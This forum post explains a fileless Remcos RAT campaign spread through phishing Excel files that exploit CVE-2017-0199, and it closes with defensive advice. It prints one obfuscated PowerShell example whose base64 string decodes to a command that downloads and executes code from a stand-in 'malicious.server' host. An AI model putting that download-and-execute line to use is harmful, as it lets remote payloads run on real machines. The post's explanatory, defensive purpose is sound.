Excel Exploit Spreads Fileless Remcos RAT

x32x01
  • by x32x01 ||
Cybercriminals are constantly finding new ways to trick users and bypass security tools. One of the latest and most dangerous techniques involves using Microsoft Excel files to spread a fileless version of Remcos RAT malware. This attack combines phishing, old but effective Office exploits, and in-memory execution to stay hidden for as long as possible. 😈

In this thread, we will break down the attack in a simple and clear way, explain how it works step by step, and show why it is still effective today. If you are interested in cybersecurity, malware analysis, or penetration testing, this deep dive will be very useful for you.

What Is Remcos RAT? 🖥️​

Remcos RAT (Remote Control and Surveillance) is a commercial remote access tool. It was originally designed for legitimate remote administration, but attackers have heavily abused it for cybercrime.

Once installed on a victim’s system, Remcos RAT allows attackers to:
  • Collect sensitive system information 📊
  • Control the computer remotely 🎮
  • Execute commands and scripts 🧠
  • Spy on users using the webcam and microphone 🎥🎙️
Because of its powerful features and ease of use, Remcos has become very popular among threat actors.

Why Fileless Malware Is So Dangerous ⚠️​

Traditional malware usually writes files to disk. Security tools often detect these files and stop the attack. Fileless malware works differently.

In a fileless attack, the malware:
  • Runs directly in memory (RAM)
  • Uses trusted system tools like PowerShell or mshta.exe
  • Leaves very few traces on disk
This makes detection much harder for antivirus and EDR solutions. 🕵️‍♂️

How the Excel Phishing Attack Starts 📧​

The attack begins with a phishing email that looks like a purchase order or invoice. These emails are designed to create urgency and curiosity.

Common tricks used in the email:
  • Fake company names
  • Professional-looking language
  • An attached Microsoft Excel file 📎
Once the victim opens the Excel file, the real attack begins.

Exploiting Microsoft Office (CVE-2017-0199) 🧨​

The malicious Excel document exploits a known Microsoft Office vulnerability called CVE-2017-0199.
This vulnerability allows remote code execution when Office loads a specially crafted file that contains an external reference.

What Happens Behind the Scenes​

  1. The Excel file triggers the exploit
  2. Office downloads a malicious HTA file from a remote server
  3. The file is launched using mshta.exe, a trusted Windows tool
Even though this vulnerability is old, many systems are still unpatched, making the attack very effective.

HTA File and Multi-Layer Obfuscation 🧩​

The downloaded HTA file is heavily obfuscated to avoid detection. It uses multiple layers of:
  • JavaScript
  • Visual Basic Script (VBS)
  • PowerShell
Each layer decrypts or loads the next one, making analysis harder for security tools and analysts.

Example of Obfuscated PowerShell (Simplified)​

Code: 
$encoded = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBzAGUAcgB2AGUAcgAiACk="
IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded)))
This technique helps attackers hide malicious behavior in plain sight.

Process Hollowing and In-Memory Execution 🧠​

After the initial payload runs, the malware uses a technique called process hollowing.

What Is Process Hollowing?​

Process hollowing works like this:
  1. A legitimate process is started (for example: explorer.exe)
  2. Its memory is emptied
  3. Malicious code is injected into it
The result is a trusted process running malicious code. 👻

In this attack, Remcos RAT is loaded directly into memory instead of being saved as a file. This makes it a true fileless variant.

What Can Remcos RAT Do on an Infected System 🛑​

Once Remcos RAT is active, attackers gain almost full control over the system.

Key capabilities include:
  • Stealing files 📂
  • Logging keystrokes ⌨️
  • Capturing clipboard data 📋
  • Recording the screen 🎥
  • Managing services and processes ⚙️
  • Editing the Windows Registry 🧾
  • Downloading additional malware ⬇️
All commands are received from a Command and Control (C2) server.

Abuse of Legitimate Services Like DocuSign 🧾​

Attackers are also abusing trusted platforms like DocuSign to make phishing attacks more convincing.

How the DocuSign Scam Works​

  • Attackers create real, paid DocuSign accounts
  • They use APIs to generate fake invoice templates
  • The emails look 100% legitimate
If a user signs the document, attackers can:
  • Request payment outside DocuSign
  • Forward signed documents to finance departments
This method bypasses many email security filters because everything looks legitimate.

ZIP File Concatenation to Bypass Detection 📦​

Another advanced trick used in recent campaigns is ZIP file concatenation.
This technique combines multiple ZIP archives into a single file. Different tools extract these files differently.

Why This Is Dangerous​

  • 7-Zip, WinRAR, and Windows Explorer behave differently
  • Some tools may ignore hidden malicious content
  • Security scanners may miss the payload entirely
Attackers use this trick to target users based on the tools they use.

Real-World Threat Actors Using These Techniques 🐺​

A threat group known as Venture Wolf has been linked to phishing campaigns targeting industries like:
  • Manufacturing
  • Construction
  • IT services
  • Telecommunications
They use malware like MetaStealer, which is based on the RedLine Stealer codebase.

How to Protect Yourself and Your Organization 🛡️​

To reduce the risk of these attacks, follow these best practices:
  • Keep Microsoft Office fully updated 🔄
  • Disable Office macros if not needed 🚫
  • Monitor PowerShell and mshta.exe usage 👀
  • Train users to spot phishing emails 🎓
  • Use advanced endpoint detection solutions
Prevention and awareness are your strongest defenses.

Final Thoughts 🧠​

This campaign shows how attackers combine old vulnerabilities, trusted tools, and social engineering to create highly effective attacks. Fileless malware like Remcos RAT is especially dangerous because it hides in memory and avoids traditional detection methods.

Understanding how these attacks work is the first step toward defending against them. Stay updated, stay cautious, and always think before opening unexpected attachments. 🔐
001.jpg
 
Last edited:
Related Threads
x32x01
Top 50 Hacking and PenTest Tools 2026 Guide
  • x32x01
Replies
0
Views
2K
x32x01
x32x01
x32x01
AI-Powered Pentesting: Tools & Best Practices
  • x32x01
Replies
0
Views
439
x32x01
x32x01
x32x01
Network Attack Types and Cyber Defense Guide
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Linux Process Injection: Techniques & Defense
  • x32x01
Replies
0
Views
622
x32x01
x32x01
x32x01
CHFI Certification: Digital Forensics Guide
  • x32x01
Replies
0
Views
441
x32x01
x32x01
Register & Login Faster
Forgot your password?
Latest Posts
Latest Resources
Forum Statistics
Threads
712
Messages
721
Members
70
Latest Member
blak_hat
Back
Top